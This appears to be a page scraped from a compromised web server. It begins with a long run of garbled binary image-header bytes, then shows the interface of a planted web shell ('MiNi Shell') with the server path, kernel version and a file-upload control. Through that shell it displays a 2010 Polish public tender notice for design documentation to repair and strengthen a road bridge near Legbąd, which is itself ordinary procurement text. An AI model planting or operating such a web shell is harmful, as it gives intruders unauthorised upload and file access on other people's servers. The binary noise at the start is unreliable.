JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100507/113459-N-2010.html

<p class="kh_header"><b>Bydgoszcz: Opracowanie dokumentacji projektowej dla zadania: Remont ze wzmocnieniem do klasy B obciążeń mostu przez Wielki Kanał Brdy w ciągu drogi woj.  Nr 237Czersk - Mąkowarsko w km 9+502 w m. Legbąd  oraz na wykonanie drogi objazdowej na czas remontu</b><br>
<b>Numer ogłoszenia: 113459 - 2010; data zamieszczenia: 07.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Dróg Wojewódzkich , ul. Fordońska 6, 85-085 Bydgoszcz, woj. kujawsko-pomorskie, tel. (052) 370-57-17, faks (052) 370-57-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw-bydgoszcz.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej dla zadania: Remont ze wzmocnieniem do klasy B obciążeń mostu przez Wielki Kanał Brdy w ciągu drogi woj.  Nr 237Czersk - Mąkowarsko w km 9+502 w m. Legbąd  oraz na wykonanie drogi objazdowej na czas remontu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Most usytuowany jest w ciągu drogi wojewódzkiej , wybudowany w roku 1923. Ustrój niosący stanowi łuk betonowy wzmocniony pancerzem żelbetowym. Przyczółki  betonowe  masywne stanowią oparcie dla łuku i są połączone bezpośrednio z łukiem.   
Zamawiający nie posiada dokumentacji projektowej istniejącego mostu. Posiada natomiast orzeczenie techniczne określające nośność obiektu.

Przedmiot zamówienia obejmuje również pisemne udzielanie odpowiedzi na zapytania dotyczące przedmiotowej dokumentacji zadawane przez Wykonawców biorących udział w postępowaniu przetargowym na realizację zadania w oparciu o tę dokumentację oraz jej zmiany, których konieczność wynikać będzie z zadawanych pytań i udzielanych odpowiedzi w ramach w.w. postępowania.

SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA:

1. Wstęp
1.1.	Przedmiot opracowania projektowego.
Przedmiotem niniejszego opisu przedmiotu zamówienia są wymagania dotyczące wykonania i odbioru dokumentacji projektowej na:
1.  Remont ze wzmocnieniem do klasy B obciążeń  mostu na wielkim kanale Brdy w ciągu drogi wojewódzkiej nr 237 Mąkowarsko - Czersk w km 9+502 w m. Legbąd 
2.Wykonanie drogi objazdowej w poziomie terenu na czas remontu mostu
 
1.2. Charakterystyka mostu:
-	 rozpiętości teoretyczna mostu  20 m 
-	Całkowita długość mostu    24 m
-	szer. Jezdni                       6,00 m
-	całkowita szerokość i mostu 7,40m
-	schemat statyczny       - łuk bezprzegubowy

Most usytuowany  jest w ciągu drogi wojewódzkiej, wybudowany w roku 1923. Ustrój niosący stanowi łuk betonowy wzmocniony pancerzem żelbetowym. Przyczółki betonowe, masywne stanowią oparcie dla łuku i są połączone bezpośrednio z łukiem .

Zamawiający nie posiada dokumentacji projektowej istniejącego mostu. Posiada  orzeczenie techniczne dotyczące stanu i nośności obiektu.

1.3 Dokumentacja wykonawcza musi zawierać:

Dokumentacja musi zawierać:
Część I
Dokumentacja projektowa  4 egzemplarze w składzie:
-Mapa do celów projektowania;
-	Uzyskanie decyzji o środowiskowych uwarunkowaniach zgodnie z ustawą prawo ochrony środowiska;
-	Opracowanie raportu o oddziaływania przedsięwzięcia na środowisko w przypadku konieczności jego wykonania;
-	Badania podłoża gruntowego wraz z niezbędną dokumentacją geologiczną - 2 egz.
-	Opracowanie projektu budowlanego wraz z uzyskaniem niezbędnych uzgodnień, w tym uzgodnień właścicieli urządzeń obcych oraz uzyskanie pozwolenia na budowę;
-	Projekt wykonawczy remontu mostu;
-	Projekt wykonawczy drogi objazdowej
-	Projekt organizacji ruchu na czas przebudowy
Część II
Materiały do przeprowadzenia postępowania o udzielenie zamówienia   4 egzemplarze w składzie:
-	Kosztorys ofertowy; należy sporządzić w układzie tabelarycznym zgodnie z tabelą elementów rozliczeniowych dla robót drogowych oraz Katalogiem robót mostowych - dla robót mostowych,
-	Szczegółowe specyfikacje techniczne; powinny być sporządzone na podstawie aktualnie obowiązujących ogólnych specyfikacji technicznych wydanych przez GDDP dla robót drogowych oraz na podstawie Katalogu robót mostowych oraz norm, przepisów, zaleceń i wytycznych - dla robót mostowych.

Część III
Kosztorys Inwestorski Sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004  Dz. U. Nr 130 poz. 1389 z 2004 r   2 egzemplarze.


Zakres planowanych robót objętych dokumentacja projektową:
-Remont mostu wraz ze wzmocnieniem konstrukcji mostu do klasy B obciążenia wg 
PN-85 S - 10030, poszerzenie chodników, wykonanie drogi objazdowej na czas remontu, wykonanie projektu czasowej organizacji ruchu na czas remontu.
2.	Projekt budowlano - wykonawczy  powinien być wykonany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r w sprawie szczegółowego zakresu i formy projektu budowlanego dz. U. Nr 120 poz 1133.
3.	Projekt budowlano - wykonawczy powinien być wykonany przez zespół projektowy kierowany przez  projektanta posiadającego uprawnienia budowlane uprawniające do wykonywania projektów w branży mostowej oraz przynależność do PIIB
-	 być opracowany w sposób zgodny z , wymaganiami ustawy - Prawo budowlane, przepisami, w tym techniczno-budowlanymi oraz obowiązującymi polskimi normami i zasadami wiedzy technicznej,
-	uzyskać wymagane opinie, uzgodnienia i sprawdzenia potwierdzające prawidłowość i zgodność z przepisami rozwiązań w projekcie

4. Materiały wyjściowe.
Zamawiający nie posiada dokumentacji projektową istniejącego mostu, posiada  orzeczenie techniczne dotyczące stanu i nośności mostu. 

5.	Ogólne wymagania dla Wykonawcy.
Wykonawca jest odpowiedzialny za zorganizowanie procesu wykonywania opracowań projektowych, w sposób aby założone cele projektowe zostały osiągnięte zgodnie z umową.
Podstawowe obowiązki projektanta określa ustawa prawo budowlane oraz ustawa o samorządzie zawodowym.
Obiekt budowlany należy projektowa zgodnie z przepisami, w tym techniczno-budowlanymi, rozporządzeniami, oraz zasadami wiedzy technicznej. Obiekty budowlane należy projektować tak  aby zapewnić optymalna ekonomiczność budowy i eksploatacji. Obiekty budowlane należy projektować z zastosowaniem nowoczesnych technologii robót i materiałów.
Wykonawca zobowiązany jest znać wszystkie przepisy wydane przesz władze centralne i lokalne oraz inne przepisy które są w jakikolwiek sposób związane z wykonywanymi opracowaniami.

6.	Ochrona i utrzymanie opracowań projektowych.
Wykonawca będzie odpowiadał za ochronę opracowań projektowych do czasu ich przekazania Zamawiającemu.

7. Wykonawca zaprojektuje w opracowaniach projektowych zastosowanie takich nowoczesnych materiałów do wykonania obiektów, które spełniają wymagania obowiązujących przepisów oraz są zgodne z wymaganiami norm i zasadami wiedzy technicznej.

8.Szata Graficzna.
Wykonawca wykona opracowanie projektowe w szacie graficznej, która spełnia następujące wymagania:
-	zapewnia czytelność, przejrzystość i jednoznaczność treści,
-	część opisowa będzie pisana na komputerze,
-	jest zgodna z wymaganiami odpowiednich przepisów, norm i wytycznych,
-	całość dokumentacji będzie umieszczona w twardym opakowaniu posiadającym uchwyty umożliwiające przenoszenie . Wewnątrz należy umieścić spis treści.
-	rysunki będą wykonywane na zasadach rysunku technicznego,
-	szata graficzna projektu budowlanego powinna spełniać wymagania rozporządzenia MI z dnia 3.07.2003 w sprawie szczegółowego zakresu i formy projektu budowlanego  Dz. U. 120 poz. 1133 z 2003 r 

ponadto wymaga się:
Przekazania zamawiającemu w formie elektronicznej wszystkich części dokumentacji.
Załączniki w formie elektronicznej zostaną wykorzystane do celów przetargowych i ewidencyjnych, do sprawozdań wynikających z zakresu prowadzenia i rozliczania powyższego zadania na etapie realizacji.

9. Wykonanie opracowań projektowych.

9.1 Ogólne wymagania dla wykonywanych opracowań projektowych.
 Wykonawca jest odpowiedzialny za jakość i zgodność zastosowanych materiałów, metod i oprogramowania komputerowego do wykonywania pomiarów, inwentaryzacji, ocen stanu technicznego  z wymaganiami opisu przedmiotu zamówienia oraz poleceniami zamawiającego.
Ujawnione wady w przekazanych opracowaniach projektowych wykonawca poprawi niezwłocznie po otrzymaniu zawiadomienia o ich wykryciu.

9.1.2 szczegółowe wymagania dla opracowań projektowych.

 Szczegółowe specyfikacje techniczne
Jest to opracowanie wykonane na podstawie ogólnych specyfikacji technicznych, zawierające szczegółowe wymagania dla wykonawcy robot w zakresie sprzętu, materiałów, transportu,  wykonania i odbioru robót, 

9.1.3  Kosztorys inwestorski 
Dane wyjściowe do kosztorysu inwestorskiego;
Przy ustalaniu cen jednostkowych robót należy stosować  ceny jednostkowe robót określone na podstawie następujących  publikacji:
-	Serwis Informacji Cenowych Budownictwa  Orgbud Serwis sp z o.o.Poznań ul. Stablewskiego 43 , ostatnie  aktualne na dzień wykonywania kosztorysu inwestorskiego publikacje  - ICCRB, ICRRB, ICRD, ICREn, 
-	W przypadku braku cen jednostkowych w ww publikacjach należy cenę jednostkową ustalić poprzez dokonanie kalkulacji szczegółowej.
Kalkulację szczegółową ceny jednostkowej należy ustalić z zastosowaniem założeń wyjściowych do kosztorysowania;
-	  Stawka roboczogodziny zgodnie z publikacją  Biuletyn Cenowy Budownictwa  BCB Serwis informacji cenowych Budownictwa Orgbud Serwis -  ostatnia aktualna na dzień wykonywania kosztorysu inwestorskiego publikacja .
R zł r-g -średnia stawka robocizny dla województwa kujawsko-pomorskiego.
-	Wskaźniki narzutów:  kosztów pośrednich -Wkp- oraz zysku -Wz zgodnie z publikacją Biuletyn Cenowy Budownictwa  BCB Serwis informacji cenowych Budownictwa  Orgbud Serwis -  ostatnia aktualna na dzień wykonywania kosztorysu inwestorskiego publikacja .
Wkp % - średni w skali województwa kujawsko-pomorskiego wskaźnik  kosztów pośrednich 
Wz %  - średni w skali województwa kujawsko-pomorskiego wskaźnik  zysku.

Ceny materiałów zgodnie z publikacją Informacyjny Zestaw Cen Czynników Produkcji Budowlanej ICCP  Orgbud Serwis - ostatnia aktualna na dzień wykonywania kosztorysu inwestorskiego publikacja
M+Kz - średnie w skali kraju ceny materiałów łącznie z kosztami zakupu bez podatku Vat.
Stawki pracy sprzętu zgodnie z publikacją informacyjny Zestaw Cen Czynników Produkcji Budowlanej ICCP  Orgbud Serwis - ostatnia aktualna na dzień wykonywania kosztorysu inwestorskiego publikacja
S m-godz.  - średnie w skali kraju stawki pracy sprzętu.
Kalkulacje ceny jednostkowej należy dokonać w oparciu o kosztorysowe normy nakładów rzeczowych określonych w KNR z uwzględnieniem zmian i uzupełnień zawartych w Biuletynach Informacyjnych MGPiB. 
W przypadku braku norm nakładów w wymienionych   katalogach,  stosować inne publikacje lub analizę indywidualną.
Narzuty zysku naliczać od sumy kosztów bezpośrednich robocizny, pracy sprzętu, kosztów pośrednich  Zj = Wz × ( Rj+Sj+Kpj) 100

Narzuty kosztów pośrednich naliczać od sumy kosztów bezpośrednich robocizny i pracy sprzętu  Kpj= Wkp × (Rj+Sj) 100
Wzór formy wykonania kosztorysu inwestorskiego do wglądu w ZDW. 
 
10. Odbiór opracowań projektowych.
Opracowania projektowe podlegają odbiorowi ostatecznemu,
Odbiór ostateczny polega na finalnej ocenie wykonanej dokumentacji projektowej: 
W przypadku przerwania umowy dla wszystkich nie zakończonych części opracowań projektowych 
w zakresie zgodności z wymaganiami umowy.
Odbioru ostatecznego dokonuje Zamawiający na podstawie Dokumentów do odbioru ostatecznego sporządzonych i dostarczonych przez Wykonawcę.
Jeżeli Zamawiający ma zastrzeżenia do Dokumentów do odbioru ostatecznego lub do zgodności opracowań projektowych z wymaganiami umowy, Wykonawca powinien przedłożyć takie wyjaśnienia i uzupełnienia jakie Zamawiający uzna za konieczne i dokonać korekt, jakie zostaną pomiędzy Zamawiającym i Wykonawcą uzgodnione. 
Jeżeli Zamawiający nie będzie miał zastrzeżeń do przedłożonych Dokumentów do odbioru ostatecznego, wyznaczy datę odbioru ostatecznego. Potwierdzeniem dokonania odbioru będzie podpisanie Protokołu Zdawczo - Odbiorczego.
11. Płatności
Podstawą płatności jest cena skalkulowana przez Wykonawcę   (kwota) podana przez Wykonawcę na formularzu oferty.
Płatność odbywać się będzie na podstawie faktury wystawionej po podpisaniu Protokołu zdawczo-odbiorczego przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE WYMAGANE</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiajacy nie precyzuje szcególnych wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże zrealizowane w ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwie dokumentacji projektowych  których przedmiotem było wykonanie projektu budowlano - wykonawczego z zakresu budowy lub przebudowy obiektu mostowego  o wartości każdego projektu  nie mniejszej niż 100 tyś zł brutto.
Warunki będą oceniana wg formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiajacy nie precyzuje szcególnych wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane aby wykonawca dysponował kadrą:
1)Projektant branży mostowej - 1 osoba
Uprawnienia - budowlane do projektowania w specjalności mostowej
Doświadczenie - 2 letnie doświadczenie w branży mostowej w ciągu których wykonał co najmniej dwie dokumentacje projektowe  z zakresu budownictwa mostowego których przedmiotem była budowa , przebudowa lub remont obiektu mostowego  o wartości każdej z dokumentacji projektowej nie mniejszej niż 100 tyś  zł brutto.
2)Sprawdzający /weryfikator/ branży mostowej - 1 osoba:

Uprawnienia - budowlane do projektowania w specjalności mostowej


Doświadczenie -   3 letnie doświadczenie w branży mostowej w ciągu których wykonał lub sprawdził min. dwie dokumentację projektową z zakresu budownictwa mostowego 
Warunki będą oceniana wg formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia na wartość nie mniejszą niż 100 000,00 zł. 
Warunki będą oceniana wg formuły spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy 
2. Wykaz części zamówienia, których wykonanie wykonawca powierzy podwykonawcom, z określeniem zakresu prac, które mają być wykonane przez podwykonawcę 
3. W przypadku ustanowienia pełnomocnika do podpisywania oferty winno być dołączone pełnomocnictwo  /oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza/  o ile nie wynika ono z innych dokumentów dołączonych do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
